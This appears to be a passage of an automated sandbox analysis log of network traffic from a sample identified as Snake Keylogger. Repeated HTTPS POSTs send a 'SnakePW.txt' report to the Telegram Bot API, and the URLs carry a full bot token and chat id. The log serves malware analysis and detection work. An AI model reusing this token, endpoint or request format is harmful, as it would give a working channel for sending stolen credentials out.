                                                                    2022-06-26 07:34:05 UTC346OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 38 36 61 36 66 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757086a6f82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:06 UTC347INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:06 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:06 UTC347INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66978,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228846,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    206192.168.2.550098149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:06 UTC347OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575708a60af7
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:06 UTC348OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 38 61 36 30 61 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575708a60af7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:06 UTC348INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:06 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:06 UTC349INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66979,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228846,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    207192.168.2.550100149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:07 UTC349OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575709220422
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:07 UTC349OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 39 32 32 30 34 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575709220422Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:07 UTC350INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:07 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:07 UTC350INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66981,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228847,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    208192.168.2.550102149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:07 UTC351OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570964c68e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:07 UTC351OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 39 36 34 63 36 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570964c68eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:07 UTC352INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:07 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:07 UTC352INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66982,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228847,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    209192.168.2.550103149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:08 UTC352OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570a1c5b38
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:08 UTC353OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 61 31 63 35 62 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570a1c5b38Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:08 UTC353INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:08 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:08 UTC354INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66983,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228848,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    21192.168.2.549789149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:46 UTC35OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d96b65d8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:46 UTC35OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 39 36 62 36 35 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d96b65d8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:47 UTC36INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:47 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:47 UTC36INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66768,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228767,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    210192.168.2.550104149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:09 UTC354OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570a53311c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:09 UTC354OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 61 35 33 33 31 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570a53311cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:09 UTC355INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:09 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:09 UTC355INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66984,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228849,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    211192.168.2.550108149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:09 UTC356OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570a95f6b0
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
